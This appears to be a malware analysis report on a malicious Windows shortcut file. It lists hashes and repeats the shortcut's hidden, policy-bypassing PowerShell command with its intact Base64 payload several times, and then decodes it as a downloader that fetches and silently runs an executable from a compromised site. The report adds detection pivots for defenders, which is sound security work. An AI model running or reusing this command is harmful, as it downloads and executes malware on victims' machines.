| Hash | Hash Value |
|---|---|
| MD5 | 0fa9232c069a73bd018a8cf28a0351e2 |
| Sha1 | ba9960018a65cc639e1238a5607f11807cfbc978 |
| Sha256 | d86c1f589136c80aaf1162651481efd79e01f3fe6ce1108faf90a8787f63d39a |
| Sha384 | c344d050fc9f9218131682576df50e62bf6c59b32b0d0fbbb5cd3648f144156bbeb7c290a2f57d84a0097369295a28d4 |
| Sha512 | 8b8cae9a757fd6d5faf51c17753efaaf9668c52f7044e6f7b3de37e716edb65aee61d0bb2f49c4a7af2000097318a35035678a9fdc2aa1e6f5419e4c78e4f047 |
| SSDeep | 48:87/k0LdpVUJq1NY1xz41M//HxxoGiBHAiYH2fMI0a6v:87/kGA0NYjOMHx+jHAiI2kv |
| TLSH | 2D71CE181AE55218D5A3CE397CF5A542CAA7FD27E8328E9E018E03454B53A14ED71F3E |

| Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" |
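
Note: the "Deobfuscated PowerShell" values above still carry the Base64 blob unchanged. Decoding `$KDL1Q6` as UTF-8 and dropping the 11-character junk prefix (`Substring(11)`) gives a downloader: it sleeps one second, sets `$ProgressPreference` to `SilentlyContinue`, creates a `System.Net.WebClient` with the User-Agent `Microsoft-Windows-Store/1.0`, saves `hxxps://gateintech[.]com/wp-content/plugins/contact-form-7/red/yes/done.exe` (defanged here) to `$env:TEMP\FVTG2done.exe`, and starts that file with `-WindowStyle Hidden`. Detection pivots: `powershell.exe` spawned from a shortcut with `-WindowStyle Hidden -ExecutionPolicy Bypass`, `FromBase64String` feeding `Invoke-Expression` in script-block logs, that User-Agent on requests made by PowerShell, and `FVTG2done.exe` executing from the TEMP directory.

| Name0 | Value | Location |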
|---|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" Malicious |
0fa9232c069a73bd018a8cf28a0351e2 |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" Malicious |
0fa9232c069a73bd018a8cf28a0351e2 > LNK CommandLine |
| Deobfuscated PowerShell | -windowstyle "Hidden" -ExecutionPolicy "Bypass" -Command "$KDL1Q6 = 'RWZkaGtCNHBzRzlTdGFydC1TbGVlcCAtU2Vjb25kcyAxOyRQcm9ncmVzc1ByZWZlcmVuY2UgPSAnU2lsZW50bHlDb250aW51ZSc7ICRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkY2xpZW50LkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywgJ01pY3Jvc29mdC1XaW5kb3dzLVN0b3JlLzEuMCcpOyAkY2xpZW50LkRvd25sb2FkRmlsZSgnaHR0cHM6Ly9nYXRlaW50ZWNoLmNvbS93cC1jb250ZW50L3BsdWdpbnMvY29udGFjdC1mb3JtLTcvcmVkL3llcy9kb25lLmV4ZScsICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIpOyBTdGFydC1Qcm9jZXNzICIkZW52OlRFTVBcRlZURzJkb25lLmV4ZSIgLVdpbmRvd1N0eWxlIEhpZGRlbjs=';$MSFJ = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($KDL1Q6));Invoke-Expression $MSFJ.Substring(11);Exit" Malicious |
0fa9232c069a73bd018a8cf28a0351e2 > LNK CommandLine > [Deobfuscated PS] |